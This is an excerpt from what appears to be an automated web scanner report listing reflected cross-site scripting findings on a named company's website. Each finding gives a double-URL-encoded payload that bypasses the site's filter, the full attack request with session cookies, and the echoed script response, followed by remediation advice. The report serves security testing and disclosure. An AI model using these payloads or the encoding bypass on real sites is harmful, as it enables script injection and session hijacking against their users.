Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:52 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc963fc";alert(1)//480dff9dc81/medialib/labware/labware-icons/eletrophoresis","E404") ;
   </script>
...[SNIP]...

1.359. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6016%2522%253balert%25281%2529%252f%252fd1982b2049c was submitted in the REST URL parameter 2. This input was echoed as c6016";alert(1)//d1982b2049c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibc6016%2522%253balert%25281%2529%252f%252fd1982b2049c/labware/labware-icons/eletrophoresis HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:54 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibc6016";alert(1)//d1982b2049c/labware/labware-icons/eletrophoresis","E404") ;
   </script>
...[SNIP]...

1.360. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e95e%2522%253balert%25281%2529%252f%252fff6adcd7dd2 was submitted in the REST URL parameter 3. This input was echoed as 8e95e";alert(1)//ff6adcd7dd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware8e95e%2522%253balert%25281%2529%252f%252fff6adcd7dd2/labware-icons/eletrophoresis HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:55 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware8e95e";alert(1)//ff6adcd7dd2/labware-icons/eletrophoresis","E404") ;
   </script>
...[SNIP]...

1.361. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6121%2522%253balert%25281%2529%252f%252f83a06fce1c0 was submitted in the REST URL parameter 4. This input was echoed as c6121";alert(1)//83a06fce1c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsc6121%2522%253balert%25281%2529%252f%252f83a06fce1c0/eletrophoresis HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:57 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsc6121";alert(1)//83a06fce1c0/eletrophoresis","E404") ;
   </script>
...[SNIP]...

1.362. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/eletrophoresis [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/eletrophoresis

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1895d%2522%253balert%25281%2529%252f%252fd50e800fe73 was submitted in the REST URL parameter 5. This input was echoed as 1895d";alert(1)//d50e800fe73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/eletrophoresis1895d%2522%253balert%25281%2529%252f%252fd50e800fe73 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:59 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/eletrophoresis1895d";alert(1)//d50e800fe73","E404") ;
   </script>
...[SNIP]...

1.363. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/filtration [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/filtration

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c89b7%2522%253balert%25281%2529%252f%252f87ad3930ee4 was submitted in the REST URL parameter 1. This input was echoed as c89b7";alert(1)//87ad3930ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcc89b7%2522%253balert%25281%2529%252f%252f87ad3930ee4/medialib/labware/labware-icons/filtration HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
